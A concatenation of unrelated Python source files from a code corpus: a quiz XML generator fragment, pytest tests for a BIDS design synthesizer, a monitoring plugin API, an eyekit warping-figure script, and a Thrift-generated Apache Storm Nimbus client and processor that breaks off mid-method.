xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK)
if question.correct_feedback_raw is None:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK
else:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK
xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml,
num_exact=question.numerical_exact_html_xml,
num_max=question.numerical_max_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'essay_question':
xml.append(ITEM_RESPROCESSING_START)
xml.append(ITEM_RESPROCESSING_ESSAY)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'file_upload_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question',
'numerical_question', 'essay_question', 'file_upload_question'):
if question.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml))
if question.correct_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
for choice in question.choices:
if choice.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}',
feedback=choice.feedback_html_xml))
xml.append(END_ITEM)
xml.append(AFTER_ITEMS)
return ''.join(xml)
| 1.78125 | 2 |
tests/test_aggregate_stats_design.py | bids-standard/bids-statsmodels-design-synthesizer | 0 | 5507 | #!/usr/bin/env python
"""Tests for `bids_statsmodels_design_synthesizer` package."""
import pytest
import subprocess as sp
from pathlib import Path
SYNTHESIZER = "aggregate_stats_design.py"
from bids_statsmodels_design_synthesizer import aggregate_stats_design as synth_mod
# from bids_statsmodels_design_synthesizer import Path(SYNTHESIZER).stem as synth_mod
EXAMPLE_USER_ARGS = {
"OUTPUT_TSV": "aggregated_design.tsv",
"MODEL": "data/ds000003/models/model-001_smdl.json",
"EVENTS_TSV": "data/ds000003/sub-01/func/sub-01_task-rhymejudgment_events.tsv",
"DURATION": 320,
}
def test_cli_help():
with pytest.raises(sp.CalledProcessError):
output = sp.check_output([SYNTHESIZER, "-h"])
with pytest.raises(sp.CalledProcessError):
output = sp.check_output([SYNTHESIZER, "--non-existent"])
def test_design_aggregation_function():
synth_mod.main(EXAMPLE_USER_ARGS)
def test_minimal_cli_functionality():
"""
We roughly want to implement the equivalent of the following:
from bids.analysis import Analysis
from bids.layout import BIDSLayout
layout = BIDSLayout("data/ds000003")
analysis = Analysis(model="data/ds000003/models/model-001_smdl.json",layout=layout)
analysis.setup()
more specifically we want to reimplement this line
https://github.com/bids-standard/pybids/blob/b6cd0f6787230ce976a374fbd5fce650865752a3/bids/analysis/analysis.py#L282
"""
bids_dir = Path(__file__).parent / "data/ds000003"
model = "model-001_smdl.json"
arg_list = " " .join([f"""--{k.lower().replace("_","-")}={v}""" for k,v in EXAMPLE_USER_ARGS.items()])
cmd = f"{SYNTHESIZER} {arg_list}"
output = sp.check_output(cmd.split())
@pytest.mark.xfail(reason="Container not setup for boutiques yet")
def test_minimal_cli_functionality_using_boutiques():
"""This might be nice to do. boutiques sets /bin/sh as the entrypoint for the contain to /bin/sh so this should be tweaked to have the conda env and the pip installed package working correctly"""
boutiques_dir = Path(__file__).parent.parent / "boutiques"
cmd = f"""
bosh
exec
launch
{boutiques_dir}/bids-app-bids-statsmodels-design-synthesizer.json
{boutiques_dir}/invocation.json
"""
output = sp.check_output(cmd.split())
| 2.328125 | 2 |
skynet-agent/plugins/plugin_api.py | skynetera/skynet | 3 | 5508 | #!/usr/bin/env python
# coding: utf-8
__author__ = 'whoami'
"""
@version: 1.0
@author: whoami
@license: Apache Licence 2.0
@contact: <EMAIL>
@site: http://www.itweet.cn
@software: PyCharm Community Edition
@file: plugin_api.py
@time: 2015-11-28 下午1:52
"""
from linux import cpu,disk,iostats,loadavg,memory,netstats,swap
def get_load_info():
return loadavg.monitor()
def get_cpu_status():
return cpu.monitor()
def get_memory_info():
return memory.monitor()
def get_swap_info():
return swap.monitor()
def get_disk_info():
return disk.monitor()
def get_network_info():
return netstats.monitor()
def get_iostats_info():
return iostats.monitor()
| 1.789063 | 2 |
code/figure_warp.py | jwcarr/drift | 2 | 5509 | import numpy as np
import eyekit
import algorithms
import core
data = eyekit.io.load(core.FIXATIONS / 'sample.json')
passages = eyekit.io.load(core.DATA / 'passages.json')
original_sequence = data['trial_5']['fixations']
fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int)
word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int)
start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int)
expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100]))
diagram = eyekit.vis.Image(1920, 1080)
diagram.draw_text_block(passages['1B'], mask_text=True)
diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6)
diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6)
_, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY)
for fixation, mapped_words in zip(original_sequence, warping_path):
for word_i in mapped_words:
word_x, word_y = word_XY[word_i]
diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True)
fig = eyekit.vis.Figure()
fig.add_image(diagram)
fig.set_crop_margin(2)
fig.set_padding(vertical=2, horizontal=3, edge=1)
fig.set_enumeration(False)
fig.save(core.VISUALS / 'illustration_warp.pdf', width=83)
# fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
| 2.125 | 2 |
storm/Nimbus.py | krux/python-storm | 0 | 5510 | <reponame>krux/python-storm<filename>storm/Nimbus.py<gh_stars>0
#
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def submitTopology(self, name, uploadedJarLocation, jsonConf, topology):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
"""
pass
def submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
- options
"""
pass
def killTopology(self, name):
"""
Parameters:
- name
"""
pass
def killTopologyWithOpts(self, name, options):
"""
Parameters:
- name
- options
"""
pass
def activate(self, name):
"""
Parameters:
- name
"""
pass
def deactivate(self, name):
"""
Parameters:
- name
"""
pass
def rebalance(self, name, options):
"""
Parameters:
- name
- options
"""
pass
def beginFileUpload(self, ):
pass
def uploadChunk(self, location, chunk):
"""
Parameters:
- location
- chunk
"""
pass
def finishFileUpload(self, location):
"""
Parameters:
- location
"""
pass
def beginFileDownload(self, file):
"""
Parameters:
- file
"""
pass
def downloadChunk(self, id):
"""
Parameters:
- id
"""
pass
def getNimbusConf(self, ):
pass
def getClusterInfo(self, ):
pass
def getTopologyInfo(self, id):
"""
Parameters:
- id
"""
pass
def getTopologyConf(self, id):
"""
Parameters:
- id
"""
pass
def getTopology(self, id):
"""
Parameters:
- id
"""
pass
def getUserTopology(self, id):
"""
Parameters:
- id
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def submitTopology(self, name, uploadedJarLocation, jsonConf, topology):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
"""
self.send_submitTopology(name, uploadedJarLocation, jsonConf, topology)
self.recv_submitTopology()
def send_submitTopology(self, name, uploadedJarLocation, jsonConf, topology):
self._oprot.writeMessageBegin('submitTopology', TMessageType.CALL, self._seqid)
args = submitTopology_args()
args.name = name
args.uploadedJarLocation = uploadedJarLocation
args.jsonConf = jsonConf
args.topology = topology
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_submitTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = submitTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
if result.ite is not None:
raise result.ite
return
def submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
- options
"""
self.send_submitTopologyWithOpts(name, uploadedJarLocation, jsonConf, topology, options)
self.recv_submitTopologyWithOpts()
def send_submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options):
self._oprot.writeMessageBegin('submitTopologyWithOpts', TMessageType.CALL, self._seqid)
args = submitTopologyWithOpts_args()
args.name = name
args.uploadedJarLocation = uploadedJarLocation
args.jsonConf = jsonConf
args.topology = topology
args.options = options
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_submitTopologyWithOpts(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = submitTopologyWithOpts_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
if result.ite is not None:
raise result.ite
return
def killTopology(self, name):
"""
Parameters:
- name
"""
self.send_killTopology(name)
self.recv_killTopology()
def send_killTopology(self, name):
self._oprot.writeMessageBegin('killTopology', TMessageType.CALL, self._seqid)
args = killTopology_args()
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_killTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = killTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def killTopologyWithOpts(self, name, options):
"""
Parameters:
- name
- options
"""
self.send_killTopologyWithOpts(name, options)
self.recv_killTopologyWithOpts()
def send_killTopologyWithOpts(self, name, options):
self._oprot.writeMessageBegin('killTopologyWithOpts', TMessageType.CALL, self._seqid)
args = killTopologyWithOpts_args()
args.name = name
args.options = options
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_killTopologyWithOpts(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = killTopologyWithOpts_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def activate(self, name):
"""
Parameters:
- name
"""
self.send_activate(name)
self.recv_activate()
def send_activate(self, name):
self._oprot.writeMessageBegin('activate', TMessageType.CALL, self._seqid)
args = activate_args()
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_activate(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = activate_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def deactivate(self, name):
"""
Parameters:
- name
"""
self.send_deactivate(name)
self.recv_deactivate()
def send_deactivate(self, name):
self._oprot.writeMessageBegin('deactivate', TMessageType.CALL, self._seqid)
args = deactivate_args()
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deactivate(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deactivate_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def rebalance(self, name, options):
"""
Parameters:
- name
- options
"""
self.send_rebalance(name, options)
self.recv_rebalance()
def send_rebalance(self, name, options):
self._oprot.writeMessageBegin('rebalance', TMessageType.CALL, self._seqid)
args = rebalance_args()
args.name = name
args.options = options
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_rebalance(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = rebalance_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
if result.ite is not None:
raise result.ite
return
def beginFileUpload(self, ):
self.send_beginFileUpload()
return self.recv_beginFileUpload()
def send_beginFileUpload(self, ):
self._oprot.writeMessageBegin('beginFileUpload', TMessageType.CALL, self._seqid)
args = beginFileUpload_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_beginFileUpload(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = beginFileUpload_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "beginFileUpload failed: unknown result");
def uploadChunk(self, location, chunk):
"""
Parameters:
- location
- chunk
"""
self.send_uploadChunk(location, chunk)
self.recv_uploadChunk()
def send_uploadChunk(self, location, chunk):
self._oprot.writeMessageBegin('uploadChunk', TMessageType.CALL, self._seqid)
args = uploadChunk_args()
args.location = location
args.chunk = chunk
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_uploadChunk(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = uploadChunk_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def finishFileUpload(self, location):
"""
Parameters:
- location
"""
self.send_finishFileUpload(location)
self.recv_finishFileUpload()
def send_finishFileUpload(self, location):
self._oprot.writeMessageBegin('finishFileUpload', TMessageType.CALL, self._seqid)
args = finishFileUpload_args()
args.location = location
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_finishFileUpload(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = finishFileUpload_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def beginFileDownload(self, file):
"""
Parameters:
- file
"""
self.send_beginFileDownload(file)
return self.recv_beginFileDownload()
def send_beginFileDownload(self, file):
self._oprot.writeMessageBegin('beginFileDownload', TMessageType.CALL, self._seqid)
args = beginFileDownload_args()
args.file = file
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_beginFileDownload(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = beginFileDownload_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "beginFileDownload failed: unknown result");
def downloadChunk(self, id):
"""
Parameters:
- id
"""
self.send_downloadChunk(id)
return self.recv_downloadChunk()
def send_downloadChunk(self, id):
self._oprot.writeMessageBegin('downloadChunk', TMessageType.CALL, self._seqid)
args = downloadChunk_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_downloadChunk(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = downloadChunk_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "downloadChunk failed: unknown result");
def getNimbusConf(self, ):
self.send_getNimbusConf()
return self.recv_getNimbusConf()
def send_getNimbusConf(self, ):
self._oprot.writeMessageBegin('getNimbusConf', TMessageType.CALL, self._seqid)
args = getNimbusConf_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getNimbusConf(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getNimbusConf_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getNimbusConf failed: unknown result");
def getClusterInfo(self, ):
self.send_getClusterInfo()
return self.recv_getClusterInfo()
def send_getClusterInfo(self, ):
self._oprot.writeMessageBegin('getClusterInfo', TMessageType.CALL, self._seqid)
args = getClusterInfo_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getClusterInfo(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getClusterInfo_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getClusterInfo failed: unknown result");
def getTopologyInfo(self, id):
"""
Parameters:
- id
"""
self.send_getTopologyInfo(id)
return self.recv_getTopologyInfo()
def send_getTopologyInfo(self, id):
self._oprot.writeMessageBegin('getTopologyInfo', TMessageType.CALL, self._seqid)
args = getTopologyInfo_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getTopologyInfo(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getTopologyInfo_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopologyInfo failed: unknown result");
def getTopologyConf(self, id):
"""
Parameters:
- id
"""
self.send_getTopologyConf(id)
return self.recv_getTopologyConf()
def send_getTopologyConf(self, id):
self._oprot.writeMessageBegin('getTopologyConf', TMessageType.CALL, self._seqid)
args = getTopologyConf_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getTopologyConf(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getTopologyConf_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopologyConf failed: unknown result");
def getTopology(self, id):
"""
Parameters:
- id
"""
self.send_getTopology(id)
return self.recv_getTopology()
def send_getTopology(self, id):
self._oprot.writeMessageBegin('getTopology', TMessageType.CALL, self._seqid)
args = getTopology_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopology failed: unknown result");
def getUserTopology(self, id):
"""
Parameters:
- id
"""
self.send_getUserTopology(id)
return self.recv_getUserTopology()
def send_getUserTopology(self, id):
self._oprot.writeMessageBegin('getUserTopology', TMessageType.CALL, self._seqid)
args = getUserTopology_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getUserTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getUserTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getUserTopology failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["submitTopology"] = Processor.process_submitTopology
self._processMap["submitTopologyWithOpts"] = Processor.process_submitTopologyWithOpts
self._processMap["killTopology"] = Processor.process_killTopology
self._processMap["killTopologyWithOpts"] = Processor.process_killTopologyWithOpts
self._processMap["activate"] = Processor.process_activate
self._processMap["deactivate"] = Processor.process_deactivate
self._processMap["rebalance"] = Processor.process_rebalance
self._processMap["beginFileUpload"] = Processor.process_beginFileUpload
self._processMap["uploadChunk"] = Processor.process_uploadChunk
self._processMap["finishFileUpload"] = Processor.process_finishFileUpload
self._processMap["beginFileDownload"] = Processor.process_beginFileDownload
self._processMap["downloadChunk"] = Processor.process_downloadChunk
self._processMap["getNimbusConf"] = Processor.process_getNimbusConf
self._processMap["getClusterInfo"] = Processor.process_getClusterInfo
self._processMap["getTopologyInfo"] = Processor.process_getTopologyInfo
self._processMap["getTopologyConf"] = Processor.process_getTopologyConf
self._processMap["getTopology"] = Processor.process_getTopology
self._processMap["getUserTopology"] = Processor.process_getUserTopology
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_submitTopology(self, seqid, iprot, oprot):
args = submitTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = submitTopology_result()
try:
self._handler.submitTopology(args.name, args.uploadedJarLocation, args.jsonConf, args.topology)
except AlreadyAliveException as e:
result.e = e
except InvalidTopologyException as ite:
result.ite = ite
oprot.writeMessageBegin("submitTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_submitTopologyWithOpts(self, seqid, iprot, oprot):
args = submitTopologyWithOpts_args()
args.read(iprot)
iprot.readMessageEnd()
result = submitTopologyWithOpts_result()
try:
self._handler.submitTopologyWithOpts(args.name, args.uploadedJarLocation, args.jsonConf, args.topology, args.options)
except AlreadyAliveException as e:
result.e = e
except InvalidTopologyException as ite:
result.ite = ite
oprot.writeMessageBegin("submitTopologyWithOpts", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_killTopology(self, seqid, iprot, oprot):
args = killTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = killTopology_result()
try:
self._handler.killTopology(args.name)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("killTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_killTopologyWithOpts(self, seqid, iprot, oprot):
args = killTopologyWithOpts_args()
args.read(iprot)
iprot.readMessageEnd()
result = killTopologyWithOpts_result()
try:
self._handler.killTopologyWithOpts(args.name, args.options)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("killTopologyWithOpts", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_activate(self, seqid, iprot, oprot):
args = activate_args()
args.read(iprot)
iprot.readMessageEnd()
result = activate_result()
try:
self._handler.activate(args.name)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("activate", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deactivate(self, seqid, iprot, oprot):
args = deactivate_args()
args.read(iprot)
iprot.readMessageEnd()
result = deactivate_result()
try:
self._handler.deactivate(args.name)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("deactivate", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_rebalance(self, seqid, iprot, oprot):
args = rebalance_args()
args.read(iprot)
iprot.readMessageEnd()
result = rebalance_result()
try:
self._handler.rebalance(args.name, args.options)
except NotAliveException as e:
result.e = e
except InvalidTopologyException as ite:
result.ite = ite
oprot.writeMessageBegin("rebalance", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_beginFileUpload(self, seqid, iprot, oprot):
args = beginFileUpload_args()
args.read(iprot)
iprot.readMessageEnd()
result = beginFileUpload_result()
result.success = self._handler.beginFileUpload()
oprot.writeMessageBegin("beginFileUpload", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_uploadChunk(self, seqid, iprot, oprot):
args = uploadChunk_args()
args.read(iprot)
iprot.readMessageEnd()
result = uploadChunk_result()
self._handler.uploadChunk(args.location, args.chunk)
oprot.writeMessageBegin("uploadChunk", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_finishFileUpload(self, seqid, iprot, oprot):
args = finishFileUpload_args()
args.read(iprot)
iprot.readMessageEnd()
result = finishFileUpload_result()
self._handler.finishFileUpload(args.location)
oprot.writeMessageBegin("finishFileUpload", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_beginFileDownload(self, seqid, iprot, oprot):
args = beginFileDownload_args()
args.read(iprot)
iprot.readMessageEnd()
result = beginFileDownload_result()
result.success = self._handler.beginFileDownload(args.file)
oprot.writeMessageBegin("beginFileDownload", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_downloadChunk(self, seqid, iprot, oprot):
args = downloadChunk_args()
args.read(iprot)
iprot.readMessageEnd()
result = downloadChunk_result()
result.success = self._handler.downloadChunk(args.id)
oprot.writeMessageBegin("downloadChunk", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getNimbusConf(self, seqid, iprot, oprot):
args = getNimbusConf_args()
args.read(iprot)
iprot.readMessageEnd()
result = getNimbusConf_result()
result.success = self._handler.getNimbusConf()
oprot.writeMessageBegin("getNimbusConf", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getClusterInfo(self, seqid, iprot, oprot):
args = getClusterInfo_args()
args.read(iprot)
iprot.readMessageEnd()
result = getClusterInfo_result()
result.success = self._handler.getClusterInfo()
oprot.writeMessageBegin("getClusterInfo", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getTopologyInfo(self, seqid, iprot, oprot):
args = getTopologyInfo_args()
args.read(iprot)
iprot.readMessageEnd()
result = getTopologyInfo_result()
try:
result.success = self._handler.getTopologyInfo(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getTopologyInfo", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getTopologyConf(self, seqid, iprot, oprot):
args = getTopologyConf_args()
args.read(iprot)
iprot.readMessageEnd()
result = getTopologyConf_result()
try:
result.success = self._handler.getTopologyConf(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getTopologyConf", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getTopology(self, seqid, iprot, oprot):
args = getTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = getTopology_result()
try:
result.success = self._handler.getTopology(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getUserTopology(self, seqid, iprot, oprot):
args = getUserTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = getUserTopology_result()
try:
result.success = self._handler.getUserTopology(args.id)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("getUserTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
